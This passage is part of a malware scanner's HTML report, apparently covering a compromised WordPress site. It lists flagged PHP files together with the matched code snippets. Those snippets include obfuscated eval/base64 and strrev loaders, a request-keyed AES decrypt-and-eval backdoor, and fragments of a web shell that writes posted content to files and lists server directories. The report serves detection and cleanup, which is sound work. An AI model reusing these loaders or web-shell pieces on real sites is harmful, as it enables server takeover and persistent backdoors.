</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 483</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$time</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 490</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">perms</span><span style="color: #007700">(</span><span style="color: #0000BB">$filename</span><span style="color: #007700">, </span><span style="color: #0000BB">$check</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 508</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$perms</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 510</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #DD0000">"<font color=</span><span style="color: #0000BB">$color</span><span style="color: #DD0000">>"</span><span style="color: #007700">.</span><span style="color: #0000BB">$perms</span><span style="color: #007700">.</span><span style="color: #DD0000">"</font>"</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 512</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">CMS</span><span style="color: #007700">()</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 515</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #DD0000">"Joomla!"</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 517</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #DD0000">"WordPress"</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 519</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #DD0000">"Unknown"</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 521</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">folder_separate</span><span style="color: #007700">(</span><span style="color: #0000BB">$path</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 526</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$path2</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 529</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">side_bar</span><span style="color: #007700">(</span><span style="color: #0000BB">$make_file</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 560</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">edit_file</span><span style="color: #007700">(</span><span style="color: #0000BB">$file</span><span style="color: #007700">, </span><span style="color: #0000BB">$current</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 62</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$files</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 96</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">del_file</span><span style="color: #007700">(</span><span style="color: #0000BB">$file</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 99</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #DD0000">"file not exists"</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Function eval <span class="badge badge-pill badge-warning py-1 px-2 ml-1 shadow-none">Warning</span></b></p><p>Potentially dangerous function `eval`</p><p><i>[<a href="https://www.php.net/eval" target="_blank" class="text-primary">https://www.php.net/eval</a>]</i></p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">eval(</span><span style="color: #0000BB">base64_decode</span><span style="color: #007700">(</span><span style="color: #DD0000">'; $search_str2 = '</span><span style="color: #007700">Array(</span><span style="color: #0000BB">base64_decode</span><span style="color: #007700">(</span><span style="color: #DD0000">'; $search_str3 = '</span><span style="color: #007700">@</span><span style="color: #0000BB">$isbot</span><span style="color: #DD0000">'; $search_str4 = '</span><span style="color: #007700">@require</span><span style="color: #DD0000">'; $search_str5 = '</span><span style="color: #007700">eval(</span><span style="color: #0000BB">gzuncompress</span><span style="color: #007700">(</span><span style="color: #0000BB">base64_decode</span><span style="color: #007700">(</span><span style="color: #DD0000">'; $search_str6 = '</span><span style="color: #007700">@include </span><span style="color: #DD0000">"\x2'; </span><span style="color: #0000BB">$search_str7</span><span style="color: #DD0000"> = '</span><span style="color: #0000BB">$OO</span><span style="color: #DD0000">'; </span><span style="color: #0000BB">$search_str8</span><span style="color: #DD0000"> = 'cache=00'; </span><span style="color: #0000BB">$search_str9</span><span style="color: #DD0000"> = 'file_get_contents(\"../index.php\")"'; $search_str10 = '</span><span style="color: #0000BB">is_uploaded_file</span><span style="color: #DD0000">'; $search_str11 = '</span><span style="color: #0000BB">base64_decode</span><span style="color: #007700">(</span><span style="color: #0000BB">$_POST</span><span style="color: #DD0000">'; $search_str12 = '</span><span style="color: #0000BB">multipart</span><span style="color: #007700">/</span><span style="color: #0000BB">form</span><span style="color: #007700">-</span><span style="color: #0000BB">data</span><span style="color: #DD0000">'; if (!file_exists($finderdata_path)) { $arr_php_file = findshells($_SERVER['</span><span style="color: #0000BB">DOCUMENT_</span><span style="color: #007700">...</span>
</span>
</code></code></td></tr><tr><td><p><b>Sign 11413268 <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 279</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Malware Signature (hash: 11413268)</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">eval(</span><span style="color: #0000BB">base64_decode</span><span style="color: #007700">(</span>
</span>
</code></code></td></tr><tr><td><p><b>Sign 4a069524 <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 294</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Malware Signature (hash: 4a069524)</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">arr_php_file </span><span style="color: #007700">= </span><span style="color: #0000BB">findshells</span><span style="color: #007700">(</span><span style="color: #0000BB">$_SERVER</span>
</span>
</code></code></td></tr><tr><td><p><b>Sign 689d8acc <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 65</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Malware Signature (hash: 689d8acc)</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">if (isset(</span><span style="color: #0000BB">$_GET</span><span style="color: #007700">[</span><span style="color: #DD0000">'juke'</span><span style="color: #007700">]))
<br />{
<br /> </span><span style="color: #0000BB">$arr_files </span><span style="color: #007700">= </span><span style="color: #0000BB">DirFilesR</span><span style="color: #007700">(</span><span style="color: #0000BB">$_SERVER</span><span style="color: #007700">[</span><span style="color: #DD0000">'DOCUMENT_ROOT'</span><span style="color: #007700">]);</span>
</span>
</code></code></td></tr></tbody></table><script type="text/javascript">$("#file_45").DataTable();</script></td></tr><tr><td><p><i class="fas fa-file text-primary mr-2"></i> /var/www/bartolini/bartolini.com.ua/wp-includes/images/images/cache.php</p><span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Size: 5.51 kB</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Created: 2026-01-27 10:15:07</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Modified: 2026-01-27 10:15:07</span> <span class="badge badge-pill badge-warning py-2 px-3 mr-1 shadow-none">Warns: 2</span> <span class="badge badge-pill badge-danger py-2 px-3 mr-1 shadow-none">Dangers: 3</span><br><table id="file_46" class="table container table-sm table-striped table-borderless"><thead ><tr><th>Description</th><th>Match</th></tr></thead><tbody><tr><td><p><b>Exploit base64_long <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1</span> <span class="badge badge-pill badge-warning py-1 px-2 ml-1 shadow-none">Warning</span></b></p><p>Long Base64 encoded text is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #DD0000">'EAPrZ+A/XcEB4bH8WDpjbFSKJMeJbnXCjJf+4zDU797v86lH04H+s+i9nlPO+61rLoc8+xHv71L+Qc9xV+ENvG77brLbDXuu94wrnc3h79s73ftq/4Fvc+b3Nxbvd5jKVgjG4ONe3kv181ZGfK7KTkRGrPNP7tuYv7/891pH9BfdjZ0rgAdhroVC8umZyJkW6fb58f0omV9+BrcGiA9g69icZLMb5LwYdgAvRqFRUUawijnWur8fWVZapNdneaI8DIz5XJCbMay07OHhYCJOBKwREpggljEMjXh2xNbZGWO2XRxh7K//ix6QIz65CCDUiiw0nm4ufYbvZB9ke1bP8WX0qxb+wmzP76EvOUltapqVXRmgS46D4uhtctpfRG95I//jx687HV/uPfftTrh1FOBoaNI6uaitafPOtqWB0ftTkYi3hY/2NdP/NRdb5/HNNLtzovCyuGVQESwjsHFDEVaGV9nBMzMiHz7V8Me5k71EPsG0z7K...</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit global_var_string <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Code Injection, through escaped global vars, allow inject attackers to execute PHP code on the target machine via HTTP request</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">${</span><span style="color: #DD0000">"_REQUEST"</span><span style="color: #007700">}</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">jVB</span><span style="color: #007700">(</span><span style="color: #0000BB">$iWS</span><span style="color: #007700">) { </span><span style="color: #0000BB">$KcfTw </span><span style="color: #007700">= ${</span><span style="color: #DD0000">"_REQUEST"</span><span style="color: #007700">}[</span><span style="color: #DD0000">"k"</span><span style="color: #007700">]; </span><span style="color: #0000BB">$FRI </span><span style="color: #007700">= </span><span style="color: #0000BB">substr</span><span style="color: #007700">(</span><span style="color: #0000BB">$KcfTw</span><span style="color: #007700">, </span><span style="color: #0000BB">0</span><span style="color: #007700">, </span><span style="color: #0000BB">16</span><span style="color: #007700">); </span><span style="color: #0000BB">$pTs </span><span style="color: #007700">= </span><span style="color: #0000BB">base64_decode</span><span style="color: #007700">(</span><span style="color: #0000BB">$iWS</span><span style="color: #007700">); return </span><span style="color: #0000BB">openssl_decrypt</span><span style="color: #007700">(</span><span style="color: #0000BB">$pTs</span><span style="color: #007700">, </span><span style="color: #DD0000">"AES-256-CBC"</span><span style="color: #007700">, </span><span style="color: #0000BB">$KcfTw</span><span style="color: #007700">, </span><span style="color: #0000BB">OPENSSL_RAW_DATA</span><span style="color: #007700">, </span><span style="color: #0000BB">$FRI</span><span style="color: #007700">); } if (</span><span style="color: #0000BB">jVB</span><span style="color: #007700">(</span><span style="color: #DD0000">'DjtPn+r4S0yvLCnquPz1fA'</span><span style="color: #007700">)){ echo </span><span style="color: #DD0000">'ASqYKUXZ2Go+jhWdiFwk0NndX1U8wk2jxvDloa</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">base64_decode</span><span style="color: #007700">(</span><span style="color: #0000BB">$jVB</span><span style="color: #007700">)))); </span><span style="color: #0000BB">?></span>
</span>
</code></code></td></tr><tr><td><p><b>Function eval <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1</span> <span class="badge badge-pill badge-warning py-1 px-2 ml-1 shadow-none">Warning</span></b></p><p>Potentially dangerous function `eval`</p><p><i>[<a href="https://www.php.net/eval" target="_blank" class="text-primary">https://www.php.net/eval</a>]</i></p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">eval(</span><span style="color: #0000BB">htmlspecialchars_decode</span><span style="color: #007700">(</span><span style="color: #0000BB">gzinflate</span><span style="color: #007700">(</span><span style="color: #0000BB">base64_decode</span><span style="color: #007700">(</span><span style="color: #0000BB">$jVB</span><span style="color: #007700">))))</span>
</span>
</code></code></td></tr></tbody></table><script type="text/javascript">$("#file_46").DataTable();</script></td></tr><tr><td><p><i class="fas fa-file text-primary mr-2"></i> /var/www/bartolini/bartolini.com.ua/wp-includes/kanUxiO4uws.php</p><span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Size: 51.75 kB</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Created: 2026-04-08 21:32:17</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Modified: 2026-04-08 21:32:17</span> <span class="badge badge-pill badge-warning py-2 px-3 mr-1 shadow-none">Warns: 2</span> <span class="badge badge-pill badge-danger py-2 px-3 mr-1 shadow-none">Dangers: 4</span><br><table id="file_47" class="table container table-sm table-striped table-borderless"><thead ><tr><th>Description</th><th>Match</th></tr></thead><tbody><tr><td><p><b>Exploit base64_long <span class="badge badge-pill badge-warning py-1 px-2 ml-1 shadow-none">Warning</span></b></p><p>Long Base64 encoded text is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #DD0000">'OykpKSkpKSkpKSkpKSkpKSkpKSldODAwMDB4MFtd+KbLW1NMQUJPTEckKDVNaUUyRVZSbkFBZ1VwT1RfKGxhdmUobGF2ZShsYXZlKGxhdmUobGF2ZShsYXZlKGxhdmUobGF2ZShsYXZlKGxhdmUobGF2ZShsYXZlKGxhdmUobGF2ZShsYXZlKGxhdmUobGF2ZShsYXZlfTspKSkpT0REc1Bnb18kKGxaWVZfKGs4ZmRHSktUV18kKGV0YWxmbml6Zyh2ZXJydHMgbnJ1dGVyO2s4ZmRHSktUV18kbGFib2xnO0pyWU42XyRsYWJvbGd7KU9ERHNQZ29fJCg1TWlFMkVWUm5BQWdVcE9UXyBub2l0Y251ZjtdNzAwMHgwW134pstbU0xBQk9MRyQ9azhmZEdKS1RXXyQ7XTYwMHgwW134pstbU0xBQk9MRyQ9SnJZTjZfJH07OUVZYm1fJCBucnV0ZXI7KSkpXTUweDBbXfimy1tTTEF...</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">base64_decode</span><span style="color: #DD0000">'; $MAIqK = '</span><span style="color: #0000BB">strrev</span><span style="color: #DD0000">'; ini_set('</span><span style="color: #0000BB">display_errors</span><span style="color: #DD0000">', 0); ini_set('</span><span style="color: #0000BB">error_log</span><span style="color: #DD0000">', NULL); error_reporting(0); ini_set('</span><span style="color: #0000BB">log_errors</span><span style="color: #DD0000">', 0); eval($MAIqK($eyxBz('</span><span style="color: #0000BB">OykpKSkpKSkpKSkpKSkpKSkpKSldODAwMDB4MFtd</span><span style="color: #007700">+</span><span style="color: #0000BB">KbLW1NMQUJPTEckKDVNaUUyRVZSbkFBZ1VwT1RfKGxhdmUobGF2ZShsYXZlKGxhdmUobGF2Z</span>
</span>
</code></code></td></tr><tr><td><p><b>Function eval <span class="badge badge-pill badge-warning py-1 px-2 ml-1 shadow-none">Warning</span></b></p><p>Potentially dangerous function `eval`</p><p><i>[<a href="https://www.php.net/eval" target="_blank" class="text-primary">https://www.php.net/eval</a>]</i></p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">eval(</span><span style="color: #0000BB">$MAIqK</span><span style="color: #007700">(</span><span style="color: #0000BB">$eyxBz</span><span style="color: #007700">(</span><span style="color: #DD0000">'OykpKSkpKSkpKSkpKSkpKSkpKSldODAwMDB4MFtd+KbLW1NMQUJPTEckKDVNaUUyRVZSbkFBZ1VwT1RfKGxhdmUobGF2ZShsYXZlKGxhdmUobGF2ZShsYXZlKGxhdmUobGF2ZShsYXZlKGxhdmUobGF2ZShsYXZlKGxhdmUobGF2ZShsYXZlKGxhdmUobGF2ZShsYXZlfTspKSkpT0REc1Bnb18kKGxaWVZfKGs4ZmRHSktUV18kKGV0YWxmbml6Zyh2ZXJydHMgbnJ1dGVyO2s4ZmRHSktUV18kbGFib2xnO0pyWU42XyRsYWJvbGd7KU9ERHNQZ29fJCg1TWlFMkVWUm5BQWdVcE9UXyBub2l0Y251ZjtdNzAwMHgwW134pstbU0xBQk9MRyQ9azhmZEdKS1RXXyQ7XTYwMHgwW134pstbU0xBQk9MRyQ9SnJZTjZfJH07OUVZYm1fJCBucnV0ZXI7KSkp...</span>
</span>
</code></code></td></tr><tr><td><p><b>Function strrev eval_strrev <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Encoded Function `eval`</p><p><i>[<a href="https://www.php.net/eval" target="_blank" class="text-primary">https://www.php.net/eval</a>]</i></p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">LavE</span>
</span>
</code></code></td></tr><tr><td><p><b>Sign de12c454 <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Malware Signature (hash: de12c454)</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">VJag</span>
</span>
</code></code></td></tr><tr><td><p><b>Sign f9dc0a55 <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Malware Signature (hash: f9dc0a55)</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #DD0000">'base64_decode'</span>
</span>
</code></code></td></tr></tbody></table><script type="text/javascript">$("#file_47").DataTable();</script></td></tr><tr><td><p><i class="fas fa-file text-primary mr-2"></i> /var/www/bartolini/bartolini.com.ua/wp-includes/TEh7SXwNrKd.php</p><span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Size: 28.35 kB</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Created: 2026-04-08 19:41:30</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Modified: 2026-04-08 19:41:30</span> <span class="badge badge-pill badge-warning py-2 px-3 mr-1 shadow-none">Warns: 1</span> <span class="badge badge-pill badge-danger py-2 px-3 mr-1 shadow-none">Dangers: 44</span><br><table id="file_48" class="table container table-sm table-striped table-borderless"><thead ><tr><th>Description</th><th>Match</th></tr></thead><tbody><tr><td><p><b>Exploit download_remote_code2 <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 652</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>RFU (Remote File Upload), via HTTP, allow to write malicious code on the target machine</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">fwrite </span><span style="color: #007700">(</span><span style="color: #0000BB">$fp</span><span style="color: #007700">, </span><span style="color: #0000BB">$_POST </span><span style="color: #007700">[</span><span style="color: #DD0000">'new'</span><span style="color: #007700">])</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit eval_base64 <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>RCE (Remote Code Execution), through Base64 text, allow remote attackers to execute arbitrary commands or code on the target machine</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">eval(</span><span style="color: #0000BB">base64_decode</span><span style="color: #007700">(</span><span style="color: #DD0000">'; $search_str2 = '</span><span style="color: #007700">Array(</span><span style="color: #0000BB">base64_decode</span><span style="color: #007700">(</span><span style="color: #DD0000">'; $search_str3 = '</span><span style="color: #007700">@</span><span style="color: #0000BB">$isbot</span><span style="color: #DD0000">'; $search_str4 = '</span><span style="color: #007700">@require</span><span style="color: #DD0000">'; $search_str5 = '</span><span style="color: #007700">eval(</span><span style="color: #0000BB">gzuncompress</span><span style="color: #007700">(</span><span style="color: #0000BB">base64_decode</span><span style="color: #007700">(</span><span style="color: #DD0000">'; $search_str6 = '</span><span style="color: #007700">@include </span><span style="color: #DD0000">"\x2'; </span><span style="color: #0000BB">$search_str7</span><span style="color: #DD0000"> = '</span><span style="color: #0000BB">$OO</span><span style="color: #DD0000">'; </span><span style="color: #0000BB">$search_str8</span><span style="color: #DD0000"> = 'cache=00'; </span><span style="color: #0000BB">$search_str9</span><span style="color: #DD0000"> = 'file_get_contents(\"../index.php\")</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit execution <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine via HTTP</p><p><i>[<a href="https://cwe.mitre.org/data/definitions/77.html" target="_blank" class="text-primary">https://cwe.mitre.org/data/definitions/77.html</a>, <a href=" https://cwe.mitre.org/data/definitions/78.html" target="_blank" class="text-primary"> https://cwe.mitre.org/data/definitions/78.html</a>]</i></p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">base64_decode</span><span style="color: #007700">(</span><span style="color: #0000BB">$_POST</span><span style="color: #DD0000">'; $search_str12 = '</span><span style="color: #0000BB">multipart</span><span style="color: #007700">/</span><span style="color: #0000BB">form</span><span style="color: #007700">-</span><span style="color: #0000BB">data</span><span style="color: #DD0000">'; if (!file_exists($finderdata_path)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #DD0000">"no have permission for chmod!"</span><span style="color: #007700">; } else { if (!</span><span style="color: #0000BB">chmod</span><span style="color: #007700">(</span><span style="color: #0000BB">$file</span><span style="color: #007700">, </span><span style="color: #0000BB">0755</span><span style="color: #007700">)) return </span><span style="color: #DD0000">"no have permission for chmod!"</span><span style="color: #007700">; </span><span style="color: #0000BB">$fp </span><span style="color: #007700">= </span><span style="color: #0000BB">fopen </span><span style="color: #007700">(</span><span style="color: #0000BB">$file</span><span style="color: #007700">, </span><span style="color: #DD0000">"w"</span><span style="color: #007700">); if (</span><span style="color: #0000BB">fwrite </span><span style="color: #007700">(</span><span style="color: #0000BB">$fp</span><span style="color: #007700">, </span><span style="color: #0000BB">$_POST </span><span style="color: #007700">[</span><span style="color: #DD0000">'new'</span><span style="color: #007700">])) </span><span style="color: #0000BB">$message </span><span style="color: #007700">= </span><span style="color: #DD0000">' - <font color="green"><b>Edited!</b></font>'</span><span style="color: #007700">; else </span><span style="color: #0000BB">$message </span><span style="color: #007700">= </span><span style="color: #DD0000">' - <font color=</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 105</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #DD0000">"no have permission for chmod!"</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 109</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #DD0000">"can not delete!"</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 111</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #DD0000">"ok!"</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 151</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">unzip_file</span><span style="color: #007700">(</span><span style="color: #0000BB">$file</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 164</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
